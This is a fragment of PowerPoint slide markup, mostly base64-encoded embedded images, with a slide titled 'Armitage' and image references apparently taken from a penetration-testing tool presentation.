/N+beC/PwrG6VjRVui27sbI6CJQfW4t+M8fIWHuqbrlEsLV1XI3Z2JUFFFFYaFFFFACWIgDCxHnw14g91ZTvVsA4WS6g9CxOU+yeaH6do8DWt0y2psxJ42R1urCxHyIPIjkaeEurEnDsjFc9Gen28OwXwkmVtUN8j20Ydh7GHMVFZ661k4njDF89JyqGFjXGejPWmEPtDZWmguOzmPA/Sq9Pgyt8vvHMe7lV4JpnisAr8Rr28D50yZOUPopYltx0pVZalsXsQ8rHx0PnURNs4ryK/L4U9kml6KCauumpkY2HAg1yWfsHxosP1rxl/wBhERwjSzN1mPM9nkPrTPaO92UkRAE+0b28tKqsm152XKTceH1pqWc8wPD+9JXpbNUmSWO2m0zZnNzawsAABTCTFgc7nsFcLg2btPyp9hdiMeVviaa2J1it5I4ln7hUns7YpblYfH+1TOC2Kq62ue01LxQAUo+XjwRwGzwgFhUkulIhq9z0rHWBfPRnpDPT3ZGy5MTKI4xrxZj6qr7TH/L1mjVkebA2M2KlCi4Qau3sr+Z4D+1a3s/BLEgVRYAAAdgFNNg7DTDRBEHeSeLNzZvy5VK1yzn2Z2ccOqCiiiplAooooAKKKKACiiigBltTZSTxskihlPEfIg8iO2sm3n3TkwbZtXhJ0e3DsVxyPfwPwrZqTnw6uCGAIIsQRcEHkQeIp4TcSc+NSPn7PRnq+7z+jU6yYTxMJP8A9bH+U+fKs+njZGKupVhoVYEEHvBrrjJS0ccouOxTPRnpvno6SmEsXJpJ4ga56SjpKAEJdnKeIHlTdtjp7Ip/0lGetsWkR3+jJ2UomylHIeVPc9HSUWFITTBgUusYFcZ6OkoNwLhq9z03z0dJWG2OM9GekFJJAAJJ0AAuSewDnV53Z9G8klnxV0TiIxpI34j+oPj4UspKOxoxctEHu/u9LjHsgsgPXkI6q937Tdw+HGtb2HsCPCxhEHeSfWY+0x+nKneCwCRIERQqqLBVFgP87ac1yzm5HZDjUQoooqZUKKKKACiiigAooooAKKKKACiiigDwiovbW7MGLW00YYjgw0dfwuNfdwqVorU6MavZk23PRXNHdsMwlX2Gskg9/qt8PCqVjMLJC2WVGRvZdSp91+NfR1N8XgI5VyyIrr7LqGHkatHma2QlwJ6PnPpKOkrZNo+i3By6qrwn/wBt9P8Ape48rVW8b6GnH6LEqe6SMr/EpPyqy5Ysg+GaM/6SjpKtOI9FWOXgsT/hlt/OFpm/o52gP/LE+EsR/rpu8fsn0n9EF0lHSVOr6OtoH/yxHjLEP66dQei3HtxSNPxTL/Rmo7x+w6S+isdJR0lX3B+huU/pcTGvciM582y1YtneifCR2MnSTH9t8q/9KW+JNK+WKHXDNmRwRs7BUVmY8FVSzHwA1q4bE9GOJmsZrQJ2HrSHwQGw95HhWrYDZMUC5YY0jXsRQt/G3H306AqMuZvReP46WyD2Dufh8ILxpd+cj9aQ+B4KO4WqcAr2iott7OhJLQUUUVhoUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQB5XtFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAf/Z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6626" name="Picture 2" descr="http://www.offensive-security.com/w/images/3/3a/Armitage_5_shells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81400" y="1371600"/>
            <a:ext cx="5168921" cy="437197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28" name="Picture 4" descr="https://encrypted-tbn2.google.com/images?q=tbn:ANd9GcRel5yYWW6FNLf2YLdaKhXwedwWAyxjwVGQX8wC3Vrr317iLlCv0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2000" y="3429001"/>
            <a:ext cx="1971675" cy="231457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117499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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Armitage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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